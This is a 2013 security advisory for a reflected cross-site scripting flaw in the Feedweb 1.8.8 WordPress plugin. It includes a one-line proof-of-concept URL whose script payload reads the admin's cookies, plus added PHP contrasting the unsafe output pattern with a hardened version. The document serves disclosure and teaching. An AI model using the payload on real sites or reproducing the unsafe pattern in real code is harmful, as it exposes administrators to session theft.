Advisory:		WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-004
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Feedweb 1.8.8
Vendor URL:		http://wordpress.org/extend/plugins/feedweb/
Vendor Status:		fixed
CVE-ID: 		Requested

==========================
Vulnerability Description
==========================

The WordPress plugin Feedweb 1.8.8 is prone to a cross-site scripting (XSS) vulnerability in the wp_post_id parameter of widget_remove.php.

===========
PoC-Exploit
===========

// requires an authenticated admin user

http://[target]/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=</script><script>alert(document.cookie)</script>

========
Solution
========

Update to version 1.9 (the latest release at the time of writing), which fixes the issue.
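As an added illustration, not code from the Feedweb plugin or its author, the following shows the unsafe pattern the Vulnerability Description refers to (a request parameter written unencoded into markup and into a script block) beside a hardened form built from WordPress's own validation and escaping helpers. The function names, the markup, the capability and the nonce action name are assumptions made for this example.

```php
<?php
// Added example (not Feedweb's own code): a hypothetical widget_remove.php that
// reads the wp_post_id parameter, shown first in the unsafe pattern the advisory
// describes and then in a hardened form. Names and markup are assumptions.

// --- Unsafe pattern: the raw parameter is written into an attribute and into a
// --- <script> block. A value that closes the script context is executed as
// --- attacker-controlled JavaScript in the admin's browser.
function feedweb_example_render_unsafe() {
    $post_id = isset( $_GET['wp_post_id'] ) ? $_GET['wp_post_id'] : '';
    echo '<input type="hidden" name="wp_post_id" value="' . $post_id . '">';
    echo '<script>var feedwebPostId = "' . $post_id . '";</script>';
}

// --- Hardened form:
//  1. Authorize and verify intent: an admin-only action checks the capability
//     and a nonce, so a crafted link cannot trigger it on the admin's behalf.
//  2. Validate: a post ID can only be a positive integer, so coerce it with
//     absint() and reject anything else before it reaches the output.
//  3. Encode for the output context: esc_attr() inside an HTML attribute,
//     esc_js() inside a quoted JavaScript string.
function feedweb_example_render_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {            // capability is an assumption
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'feedweb_example_remove_widget' );  // nonce action is an assumption

    $post_id = isset( $_GET['wp_post_id'] ) ? absint( wp_unslash( $_GET['wp_post_id'] ) ) : 0;
    if ( 0 === $post_id || null === get_post( $post_id ) ) {
        wp_die( 'Invalid post ID.', '', array( 'response' => 400 ) );
    }

    echo '<input type="hidden" name="wp_post_id" value="' . esc_attr( $post_id ) . '">';
    echo '<script>var feedwebPostId = "' . esc_js( $post_id ) . '";</script>';
}
```

The link that leads to the hardened handler would be built with wp_nonce_url() using the same action name, so the nonce check in check_admin_referer() passes for links the plugin generated and fails for a link pasted from elsewhere. Validation with absint() alone already defeats the reflected payload, since no markup survives the integer cast; the output escaping is kept regardless, so the page stays safe if the parameter's type is later relaxed.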

===================
Disclosure Timeline
===================

30-Mar-2013 - informed plugins@wordpress.org
01-Apr-2013 - fixed by developer

=======
Credits
=======

Vulnerability found and advisory written by Stefan Schurtz.

==========
References
==========
 
http://wordpress.org/extend/plugins/feedweb/changelog/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-004.txt